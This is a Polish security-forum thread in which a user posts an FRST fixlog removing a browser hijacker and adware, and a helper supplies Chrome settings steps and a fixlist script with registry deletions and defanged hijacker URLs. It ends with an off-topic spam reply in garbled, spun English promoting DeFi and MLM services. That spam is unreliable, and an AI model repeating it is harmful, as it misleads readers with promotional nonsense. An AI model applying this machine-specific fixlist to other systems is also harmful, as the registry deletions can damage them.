HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects\{B164E929-A1B6-4A06-B104-2CD0E90A88FF} => klucz pomyślnie usunięto
HKCR\CLSID\{B164E929-A1B6-4A06-B104-2CD0E90A88FF} => klucz nie znaleziono.
C:\Windows\system32\GroupPolicy\Machine => pomyślnie przeniesiono
C:\Windows\system32\GroupPolicy\GPT.ini => pomyślnie przeniesiono
C:\Windows\SysWOW64\GroupPolicy\GPT.ini => pomyślnie przeniesiono
HKLM\Software\microsoft\windows nt\currentversion\Image File Execution Options\taskmgr.exe => klucz pomyślnie usunięto
HKU\S-1-5-21-1070030570-2694662635-206350218-1001\Software\Microsoft\Windows\CurrentVersion\Policies\system\\Shell => Wartość pomyślnie usunięto
C:\Windows\System32\Drivers\etc\hosts => pomyślnie przeniesiono
Hosts pomyślnie przywrócono.

=========== EmptyTemp: ==========

BITS transfer queue => 8388608 B
DOMStore, IE Recovery, AppCache, Feeds Cache, Thumbcache, IconCache => 216114538 B
Java, Flash, Steam htmlcache => 2307 B
Windows/system/drivers => 1016597723 B
Edge => 0 B
Chrome => 931222832 B
Firefox => 373511637 B
Opera => 30344279 B

Temp, IE cache, history, cookies, recent:
Default => 0 B
Users => 0 B
ProgramData => 0 B
Public => 0 B
systemprofile => 489921 B
systemprofile32 => 65942903 B
LocalService => 803062 B
NetworkService => 15788 B
Adam => 1076125890 B
Administrator => 241480 B

RecycleBin => 546312897 B
EmptyTemp: => 4 GB danych tymczasowych Usunięto.

================================

Rezultat przenoszenia plikĂłw przy restarcie (Tryb startu: Normal) (Data i godzina: 24-04-2017 13:43:47)

C:\Program Files (x86)\Eastness\Application\chrome.dll => pomyślnie usunięto
C:\Program Files (x86)\Eastness\Application\chrome.exe => pomyślnie usunięto
C:\Program Files (x86)\Eastness\Application\chrome_100_percent.pak => pomyślnie usunięto
C:\Program Files (x86)\Eastness\Application\chrome_200_percent.pak => pomyślnie usunięto
C:\Program Files (x86)\Eastness\Application\chrome_child.dll => pomyślnie usunięto
C:\Program Files (x86)\Eastness\Application\chrome_elf.dll => pomyślnie usunięto
C:\Program Files (x86)\Eastness\Application\chrome_watcher.dll => pomyślnie usunięto
C:\Program Files (x86)\Eastness\Application\d3dcompiler_47.dll => pomyślnie usunięto
C:\Program Files (x86)\Eastness\Application\icudtl.dat => pomyślnie usunięto
C:\Program Files (x86)\Eastness\Application\libegl.dll => pomyślnie usunięto
C:\Program Files (x86)\Eastness\Application\libglesv2.dll => pomyślnie usunięto
C:\Program Files (x86)\Eastness\Application\locales\pl.pak => pomyślnie usunięto
C:\Program Files (x86)\Eastness\Application\natives_blob.bin => pomyślnie usunięto
C:\Program Files (x86)\Eastness\Application\resources.pak => pomyślnie usunięto
C:\Program Files (x86)\Eastness\Application\snapshot_blob.bin => pomyślnie usunięto
C:\Program Files (x86)\Eastness => pomyślnie usunięto
C:\Program Files (x86)\MyPC Backup\LogicNP.EZShellExtensions.dll => pomyślnie usunięto
C:\Program Files (x86)\MyPC Backup\MPCBContextMenu.dll => pomyślnie usunięto
C:\Program Files (x86)\MyPC Backup\x64\SQLite.Interop.dll => pomyślnie usunięto
C:\Program Files (x86)\MyPC Backup => pomyślnie usunięto
C:\Users\Adam\AppData\Local\Eastness\User Data\Default\Affiliation Database => pomyślnie usunięto
C:\Users\Adam\AppData\Local\Eastness\User Data\Default\Application Cache\Index => pomyślnie usunięto
C:\Users\Adam\AppData\Local\Eastness\User Data\Default\Cache\data_0 => pomyślnie usunięto
C:\Users\Adam\AppData\Local\Eastness\User Data\Default\Cache\data_1 => pomyślnie usunięto
C:\Users\Adam\AppData\Local\Eastness\User Data\Default\Cache\data_2 => pomyślnie usunięto
C:\Users\Adam\AppData\Local\Eastness\User Data\Default\Cache\data_3 => pomyślnie usunięto
C:\Users\Adam\AppData\Local\Eastness\User Data\Default\Cache\index => pomyślnie usunięto
C:\Users\Adam\AppData\Local\Eastness\User Data\Default\Cookies => pomyślnie usunięto
C:\Users\Adam\AppData\Local\Eastness\User Data\Default\Cookies-journal => pomyślnie usunięto
C:\Users\Adam\AppData\Local\Eastness\User Data\Default\Current Session => pomyślnie usunięto
C:\Users\Adam\AppData\Local\Eastness\User Data\Default\Current Tabs => pomyślnie usunięto
C:\Users\Adam\AppData\Local\Eastness\User Data\Default\data_reduction_proxy_leveldb\000003.log => pomyślnie usunięto
C:\Users\Adam\AppData\Local\Eastness\User Data\Default\data_reduction_proxy_leveldb\LOCK => pomyślnie usunięto
C:\Users\Adam\AppData\Local\Eastness\User Data\Default\data_reduction_proxy_leveldb\LOG => pomyślnie usunięto
C:\Users\Adam\AppData\Local\Eastness\User Data\Default\data_reduction_proxy_leveldb\MANIFEST-000001 => pomyślnie usunięto
C:\Users\Adam\AppData\Local\Eastness\User Data\Default\databases\Databases.db => pomyślnie usunięto
C:\Users\Adam\AppData\Local\Eastness\User Data\Default\Extension Cookies => pomyślnie usunięto
C:\Users\Adam\AppData\Local\Eastness\User Data\Default\Extension Cookies-journal => pomyślnie usunięto
C:\Users\Adam\AppData\Local\Eastness\User Data\Default\Extension State\008113.ldb => pomyślnie usunięto
C:\Users\Adam\AppData\Local\Eastness\User Data\Default\Extension State\008115.log => pomyślnie usunięto
C:\Users\Adam\AppData\Local\Eastness\User Data\Default\Extension State\LOCK => pomyślnie usunięto
C:\Users\Adam\AppData\Local\Eastness\User Data\Default\Extension State\LOG => pomyślnie usunięto
C:\Users\Adam\AppData\Local\Eastness\User Data\Default\Extension State\MANIFEST-000410 => pomyślnie usunięto
C:\Users\Adam\AppData\Local\Eastness\User Data\Default\Favicons => pomyślnie usunięto
C:\Users\Adam\AppData\Local\Eastness\User Data\Default\Favicons-journal => pomyślnie usunięto
C:\Users\Adam\AppData\Local\Eastness\User Data\Default\File System\Origins\000793.ldb => pomyślnie usunięto
C:\Users\Adam\AppData\Local\Eastness\User Data\Default\File System\Origins\000796.log => pomyślnie usunięto
C:\Users\Adam\AppData\Local\Eastness\User Data\Default\File System\Origins\LOCK => pomyślnie usunięto
C:\Users\Adam\AppData\Local\Eastness\User Data\Default\File System\Origins\LOG => pomyślnie usunięto
C:\Users\Adam\AppData\Local\Eastness\User Data\Default\File System\Origins\MANIFEST-000265 => pomyślnie usunięto
C:\Users\Adam\AppData\Local\Eastness\User Data\Default\GCM Store\001750.ldb => pomyślnie usunięto
C:\Users\Adam\AppData\Local\Eastness\User Data\Default\GCM Store\001752.ldb => pomyślnie usunięto
C:\Users\Adam\AppData\Local\Eastness\User Data\Default\GCM Store\001753.log => pomyślnie usunięto
C:\Users\Adam\AppData\Local\Eastness\User Data\Default\GCM Store\Encryption\000003.log => pomyślnie usunięto
C:\Users\Adam\AppData\Local\Eastness\User Data\Default\GCM Store\Encryption\LOCK => pomyślnie usunięto
C:\Users\Adam\AppData\Local\Eastness\User Data\Default\GCM Store\Encryption\LOG => pomyślnie usunięto
C:\Users\Adam\AppData\Local\Eastness\User Data\Default\GCM Store\Encryption\MANIFEST-000001 => pomyślnie usunięto
C:\Users\Adam\AppData\Local\Eastness\User Data\Default\GCM Store\LOCK => pomyślnie usunięto
C:\Users\Adam\AppData\Local\Eastness\User Data\Default\GCM Store\LOG => pomyślnie usunięto
C:\Users\Adam\AppData\Local\Eastness\User Data\Default\GCM Store\MANIFEST-000413 => pomyślnie usunięto
C:\Users\Adam\AppData\Local\Eastness\User Data\Default\GPUCache\data_0 => pomyślnie usunięto
C:\Users\Adam\AppData\Local\Eastness\User Data\Default\GPUCache\data_1 => pomyślnie usunięto
C:\Users\Adam\AppData\Local\Eastness\User Data\Default\GPUCache\data_2 => pomyślnie usunięto
C:\Users\Adam\AppData\Local\Eastness\User Data\Default\GPUCache\data_3 => pomyślnie usunięto
C:\Users\Adam\AppData\Local\Eastness\User Data\Default\GPUCache\index => pomyślnie usunięto
C:\Users\Adam\AppData\Local\Eastness\User Data\Default\History => pomyślnie usunięto
C:\Users\Adam\AppData\Local\Eastness\User Data\Default\History-journal => pomyślnie usunięto
C:\Users\Adam\AppData\Local\Eastness\User Data\Default\Local Extension Settings\ekbmlhopnonkbfompbndcifmljkljhji\000003.log => pomyślnie usunięto
C:\Users\Adam\AppData\Local\Eastness\User Data\Default\Local Extension Settings\ekbmlhopnonkbfompbndcifmljkljhji\LOCK => pomyślnie usunięto
C:\Users\Adam\AppData\Local\Eastness\User Data\Default\Local Extension Settings\ekbmlhopnonkbfompbndcifmljkljhji\LOG => pomyślnie usunięto
C:\Users\Adam\AppData\Local\Eastness\User Data\Default\Local Extension Settings\ekbmlhopnonkbfompbndcifmljkljhji\MANIFEST-000001 => pomyślnie usunięto
C:\Users\Adam\AppData\Local\Eastness\User Data\Default\Local Extension Settings\gighmmpiobklfepjocnamgkkbiglidom\000005.ldb => pomyślnie usunięto
C:\Users\Adam\AppData\Local\Eastness\User Data\Default\Local Extension Settings\gighmmpiobklfepjocnamgkkbiglidom\000234.log => pomyślnie usunięto
C:\Users\Adam\AppData\Local\Eastness\User Data\Default\Local Extension Settings\gighmmpiobklfepjocnamgkkbiglidom\000236.ldb => pomyślnie usunięto
C:\Users\Adam\AppData\Local\Eastness\User Data\Default\Local Extension Settings\gighmmpiobklfepjocnamgkkbiglidom\000237.ldb => pomyślnie usunięto
C:\Users\Adam\AppData\Local\Eastness\User Data\Default\Local Extension Settings\gighmmpiobklfepjocnamgkkbiglidom\LOCK => pomyślnie usunięto
C:\Users\Adam\AppData\Local\Eastness\User Data\Default\Local Extension Settings\gighmmpiobklfepjocnamgkkbiglidom\LOG => pomyślnie usunięto
C:\Users\Adam\AppData\Local\Eastness\User Data\Default\Local Extension Settings\gighmmpiobklfepjocnamgkkbiglidom\MANIFEST-000001 => pomyślnie usunięto
C:\Users\Adam\AppData\Local\Eastness\User Data\Default\Local Extension Settings\nkeimhogjdpnpccoofpliimaahmaaome\000003.log => pomyślnie usunięto
C:\Users\Adam\AppData\Local\Eastness\User Data\Default\Local Extension Settings\nkeimhogjdpnpccoofpliimaahmaaome\LOCK => pomyślnie usunięto
C:\Users\Adam\AppData\Local\Eastness\User Data\Default\Local Extension Settings\nkeimhogjdpnpccoofpliimaahmaaome\LOG => pomyślnie usunięto
C:\Users\Adam\AppData\Local\Eastness\User Data\Default\Local Extension Settings\nkeimhogjdpnpccoofpliimaahmaaome\MANIFEST-000001 => pomyślnie usunięto
C:\Users\Adam\AppData\Local\Eastness\User Data\Default\Local Storage\chrome-extension_ekbmlhopnonkbfompbndcifmljkljhji_0.localstorage => pomyślnie usunięto
C:\Users\Adam\AppData\Local\Eastness\User Data\Default\Local Storage\chrome-extension_gighmmpiobklfepjocnamgkkbiglidom_0.localstorage => pomyślnie usunięto
C:\Users\Adam\AppData\Local\Eastness\User Data\Default\Local Storage\chrome-extension_nkeimhogjdpnpccoofpliimaahmaaome_0.localstorage => pomyślnie usunięto
C:\Users\Adam\AppData\Local\Eastness\User Data\Default\Local Storage\chrome-extension_nkeimhogjdpnpccoofpliimaahmaaome_0.localstorage-journal => pomyślnie usunięto
C:\Users\Adam\AppData\Local\Eastness\User Data\Default\Local Storage\chrome-extension_pkedcjkdefgpdelpbcmbmeomcjbeemfm_0.localstorage => pomyślnie usunięto
C:\Users\Adam\AppData\Local\Eastness\User Data\Default\Local Storage\chrome-extension_pkedcjkdefgpdelpbcmbmeomcjbeemfm_0.localstorage-journal => pomyślnie usunięto
C:\Users\Adam\AppData\Local\Eastness\User Data\Default\Local Storage\http_forum.programosy.pl_0.localstorage => pomyślnie usunięto
C:\Users\Adam\AppData\Local\Eastness\User Data\Default\Local Storage\http_forum.programosy.pl_0.localstorage-journal => pomyślnie usunięto
C:\Users\Adam\AppData\Local\Eastness\User Data\Default\Local Storage\http_nk.pl_0.localstorage => pomyślnie usunięto
C:\Users\Adam\AppData\Local\Eastness\User Data\Default\Local Storage\http_nk.pl_0.localstorage-journal => pomyślnie usunięto
C:\Users\Adam\AppData\Local\Eastness\User Data\Default\Local Storage\http_stalowka.pl_0.localstorage => pomyślnie usunięto
C:\Users\Adam\AppData\Local\Eastness\User Data\Default\Local Storage\http_weszlo.com_0.localstorage => pomyślnie usunięto
C:\Users\Adam\AppData\Local\Eastness\User Data\Default\Local Storage\http_www.90minut.pl_0.localstorage => pomyślnie usunięto
C:\Users\Adam\AppData\Local\Eastness\User Data\Default\Local Storage\http_www.dailymotion.com_0.localstorage => pomyślnie usunięto
C:\Users\Adam\AppData\Local\Eastness\User Data\Default\Local Storage\http_www.skokinarciarskie.pl_0.localstorage => pomyślnie usunięto
C:\Users\Adam\AppData\Local\Eastness\User Data\Default\Local Storage\https_clients5.google.com_0.localstorage => pomyślnie usunięto
C:\Users\Adam\AppData\Local\Eastness\User Data\Default\Local Storage\https_en.wikipedia.org_0.localstorage => pomyślnie usunięto
C:\Users\Adam\AppData\Local\Eastness\User Data\Default\Local Storage\https_en.wikipedia.org_0.localstorage-journal => pomyślnie usunięto
C:\Users\Adam\AppData\Local\Eastness\User Data\Default\Local Storage\https_nk.pl_0.localstorage => pomyślnie usunięto
C:\Users\Adam\AppData\Local\Eastness\User Data\Default\Local Storage\https_nk.pl_0.localstorage-journal => pomyślnie usunięto
C:\Users\Adam\AppData\Local\Eastness\User Data\Default\Local Storage\https_notifications.google.com_0.localstorage => pomyślnie usunięto
C:\Users\Adam\AppData\Local\Eastness\User Data\Default\Local Storage\https_pl.wikipedia.org_0.localstorage => pomyślnie usunięto
C:\Users\Adam\AppData\Local\Eastness\User Data\Default\Local Storage\https_pl.wikipedia.org_0.localstorage-journal => pomyślnie usunięto
C:\Users\Adam\AppData\Local\Eastness\User Data\Default\Local Storage\https_www.facebook.com_0.localstorage => pomyślnie usunięto
C:\Users\Adam\AppData\Local\Eastness\User Data\Default\Local Storage\https_www.facebook.com_0.localstorage-journal => pomyślnie usunięto
C:\Users\Adam\AppData\Local\Eastness\User Data\Default\Local Storage\https_www.google.pl_0.localstorage => pomyślnie usunięto
C:\Users\Adam\AppData\Local\Eastness\User Data\Default\Local Storage\https_www.the-scorpions.com_0.localstorage => pomyślnie usunięto
C:\Users\Adam\AppData\Local\Eastness\User Data\Default\Local Storage\https_www.the-scorpions.com_0.localstorage-journal => pomyślnie usunięto
C:\Users\Adam\AppData\Local\Eastness\User Data\Default\Local Storage\https_www.youtube.com_0.localstorage => pomyślnie usunięto
C:\Users\Adam\AppData\Local\Eastness\User Data\Default\Local Storage\https_www.youtube.com_0.localstorage-journal => pomyślnie usunięto
C:\Users\Adam\AppData\Local\Eastness\User Data\Default\Login Data => pomyślnie usunięto
C:\Users\Adam\AppData\Local\Eastness\User Data\Default\Login Data-journal => pomyślnie usunięto
C:\Users\Adam\AppData\Local\Eastness\User Data\Default\Managed Extension Settings\gighmmpiobklfepjocnamgkkbiglidom\000003.log => pomyślnie usunięto
C:\Users\Adam\AppData\Local\Eastness\User Data\Default\Managed Extension Settings\gighmmpiobklfepjocnamgkkbiglidom\LOCK => pomyślnie usunięto
C:\Users\Adam\AppData\Local\Eastness\User Data\Default\Managed Extension Settings\gighmmpiobklfepjocnamgkkbiglidom\LOG => pomyślnie usunięto
C:\Users\Adam\AppData\Local\Eastness\User Data\Default\Managed Extension Settings\gighmmpiobklfepjocnamgkkbiglidom\MANIFEST-000001 => pomyślnie usunięto
C:\Users\Adam\AppData\Local\Eastness\User Data\Default\Media Cache\data_0 => pomyślnie usunięto
C:\Users\Adam\AppData\Local\Eastness\User Data\Default\Media Cache\data_1 => pomyślnie usunięto
C:\Users\Adam\AppData\Local\Eastness\User Data\Default\Media Cache\data_2 => pomyślnie usunięto
C:\Users\Adam\AppData\Local\Eastness\User Data\Default\Media Cache\data_3 => pomyślnie usunięto
C:\Users\Adam\AppData\Local\Eastness\User Data\Default\Media Cache\index => pomyślnie usunięto
C:\Users\Adam\AppData\Local\Eastness\User Data\Default\Network Action Predictor => pomyślnie usunięto
C:\Users\Adam\AppData\Local\Eastness\User Data\Default\Network Action Predictor-journal => pomyślnie usunięto
C:\Users\Adam\AppData\Local\Eastness\User Data\Default\Origin Bound Certs => pomyślnie usunięto
C:\Users\Adam\AppData\Local\Eastness\User Data\Default\Platform Notifications\000003.log => pomyślnie usunięto
C:\Users\Adam\AppData\Local\Eastness\User Data\Default\Platform Notifications\LOCK => pomyślnie usunięto
C:\Users\Adam\AppData\Local\Eastness\User Data\Default\Platform Notifications\LOG => pomyślnie usunięto
C:\Users\Adam\AppData\Local\Eastness\User Data\Default\Platform Notifications\MANIFEST-000001 => pomyślnie usunięto
C:\Users\Adam\AppData\Local\Eastness\User Data\Default\previews_opt_out.db => pomyślnie usunięto
C:\Users\Adam\AppData\Local\Eastness\User Data\Default\QuotaManager => pomyślnie usunięto
C:\Users\Adam\AppData\Local\Eastness\User Data\Default\QuotaManager-journal => pomyślnie usunięto
C:\Users\Adam\AppData\Local\Eastness\User Data\Default\Service Worker\Database\000044.log => pomyślnie usunięto
C:\Users\Adam\AppData\Local\Eastness\User Data\Default\Service Worker\Database\000046.ldb => pomyślnie usunięto
C:\Users\Adam\AppData\Local\Eastness\User Data\Default\Service Worker\Database\LOCK => pomyślnie usunięto
C:\Users\Adam\AppData\Local\Eastness\User Data\Default\Service Worker\Database\LOG => pomyślnie usunięto
C:\Users\Adam\AppData\Local\Eastness\User Data\Default\Service Worker\Database\MANIFEST-000001 => pomyślnie usunięto
C:\Users\Adam\AppData\Local\Eastness\User Data\Default\Session Storage\032928.log => pomyślnie usunięto
C:\Users\Adam\AppData\Local\Eastness\User Data\Default\Session Storage\032931.ldb => pomyślnie usunięto
C:\Users\Adam\AppData\Local\Eastness\User Data\Default\Session Storage\LOCK => pomyślnie usunięto
C:\Users\Adam\AppData\Local\Eastness\User Data\Default\Session Storage\LOG => pomyślnie usunięto
C:\Users\Adam\AppData\Local\Eastness\User Data\Default\Session Storage\MANIFEST-000001 => pomyślnie usunięto
C:\Users\Adam\AppData\Local\Eastness\User Data\Default\Shortcuts => pomyślnie usunięto
C:\Users\Adam\AppData\Local\Eastness\User Data\Default\Shortcuts-journal => pomyślnie usunięto
C:\Users\Adam\AppData\Local\Eastness\User Data\Default\Sync Data\SyncData.sqlite3 => pomyślnie usunięto
C:\Users\Adam\AppData\Local\Eastness\User Data\Default\Sync Data\SyncData.sqlite3-journal => pomyślnie usunięto
C:\Users\Adam\AppData\Local\Eastness\User Data\Default\Sync Extension Settings\pkedcjkdefgpdelpbcmbmeomcjbeemfm\000003.log => pomyślnie usunięto
C:\Users\Adam\AppData\Local\Eastness\User Data\Default\Sync Extension Settings\pkedcjkdefgpdelpbcmbmeomcjbeemfm\LOCK => pomyślnie usunięto
C:\Users\Adam\AppData\Local\Eastness\User Data\Default\Sync Extension Settings\pkedcjkdefgpdelpbcmbmeomcjbeemfm\LOG => pomyślnie usunięto
C:\Users\Adam\AppData\Local\Eastness\User Data\Default\Sync Extension Settings\pkedcjkdefgpdelpbcmbmeomcjbeemfm\MANIFEST-000001 => pomyślnie usunięto
C:\Users\Adam\AppData\Local\Eastness\User Data\Default\Top Sites => pomyślnie usunięto
C:\Users\Adam\AppData\Local\Eastness\User Data\Default\Top Sites-journal => pomyślnie usunięto
C:\Users\Adam\AppData\Local\Eastness\User Data\Default\Visited Links => pomyślnie usunięto
C:\Users\Adam\AppData\Local\Eastness\User Data\Default\Web Data => pomyślnie usunięto
C:\Users\Adam\AppData\Local\Eastness\User Data\Default\Web Data-journal => pomyślnie usunięto
C:\Users\Adam\AppData\Local\Eastness\User Data\lockfile => pomyślnie usunięto
C:\Users\Adam\AppData\Local\Eastness\User Data\pl-PL-3-0.bdic => pomyślnie usunięto
C:\Users\Adam\AppData\Local\Eastness\User Data\ShaderCache\GPUCache\data_0 => pomyślnie usunięto
C:\Users\Adam\AppData\Local\Eastness\User Data\ShaderCache\GPUCache\data_1 => pomyślnie usunięto
C:\Users\Adam\AppData\Local\Eastness\User Data\ShaderCache\GPUCache\data_2 => pomyślnie usunięto
C:\Users\Adam\AppData\Local\Eastness\User Data\ShaderCache\GPUCache\data_3 => pomyślnie usunięto
C:\Users\Adam\AppData\Local\Eastness\User Data\ShaderCache\GPUCache\index => pomyślnie usunięto
C:\Users\Adam\AppData\Local\Eastness => pomyślnie usunięto

==== Koniec  Fixlog 13:43:50 ====

Czyli wszystko oki? Na razie po tym restarcie nic Avast nie krzyczy o zagrożeniu itp.
apollo2
~user
 
Posty: 2
Dołączenie: 22 Kwi 2017, 22:07



"infekcja" przeglądarek - proszę o pomoc.

Postprzez ordynat 24 Kwi 2017, 15:56

1) Uruchom Google Chrome
> Naciśnij klawisze: lewy Alt+F i kliknij przycisk Ustawienia >
> Sekcja: Po uruchomieniu > wybierz: Otwórz konkretną stronę lub zestaw stron >
> Kliknij: Wybierz strony >
> Usuń: yoursearching.com,

> w sekcji Wyszukiwanie wybierz: Zarządzaj wyszukiwarkami >
> z prawokliku ustaw nową domyślną wyszukiwarkę (np. Google),
> z prawokliku usuń: yoursearching i kliknij przycisk: Gotowe

2) Otwórz Notatnik i wklej w nim:
DeleteKey: HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Shopping App by Ask
DeleteKey: HKLM\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\Shopping App by Ask
DeleteKey: HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Search App by Ask
DeleteKey: HKLM\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\Search App by Ask
RemoveDirectory: C:\Program Files (x86)\Temp
CHR StartupUrls: Default -> "hxxp://google.pl/","hxxp://www.yoursearching.com/?type=hp&ts=1449687316&z=196b1e7bef7940c46720594gcz6z9t0q7bemacag2z&from=cornl&uid=ST1000DM003-1ER162_Z4Y42GHSXXXXZ4Y42GHS"
CHR DefaultSearchURL: Default -> hxxp://www.yoursearching.com/web/?type=ds&ts=1449687316&z=196b1e7bef7940c46720594gcz6z9t0q7bemacag2z&from=cornl&uid=ST1000DM003-1ER162_Z4Y42GHSXXXXZ4Y42GHS&q={searchTerms}
CHR DefaultSearchKeyword: Default -> yoursearching
EmptyTemp:

Plik zapisz pod nazwą fixlist.txt i umieść obok FRST.exe
Uruchom FRST i kliknij przycisk Fix (NAPRAW).

----------------------
Jeśli będzie OK, to będziemy kończyć:
Otwórz Notatnik i wklej w nim:
DeleteQuarantine:

Plik zapisz pod nazwą fixlist.txt i umieść obok FRST. Uruchom FRST i kliknij w Fix (NAPRAW).
przez SHIFT+DEL usuń pozostały folder C:\FRST.
ordynat
~user
 
Posty: 4765
Dołączenie: 02 Kwi 2010, 11:18
Pochwały: 866



"infekcja" przeglądarek - proszę o pomoc.

Postprzez RichardDowson 14 Maj 2023, 23:44

Yield cultivating is a well known DeFi idea that permits clients to procure compensations by conveying liquidity to decentralized trades and other DeFi conventions. The product generally screens different DeFi conventions, breaks down market information, and executes the most beneficial exchanges naturally. MLM permits clients to procure commissions by enlisting new individuals into an organization. It incorporates different elements, for example, reference following, commission the executives, and prizes dissemination that assist organizations with dealing with their MLM programs successfully>> bsc game development
RichardDowson
~user
 
Posty: 1
Dołączenie: 14 Maj 2023, 23:42




Powróć do Bezpieczeństwo

Kto jest na forum

Użytkownicy przeglądający to forum: Brak zarejestrowanych użytkowników oraz 5 gości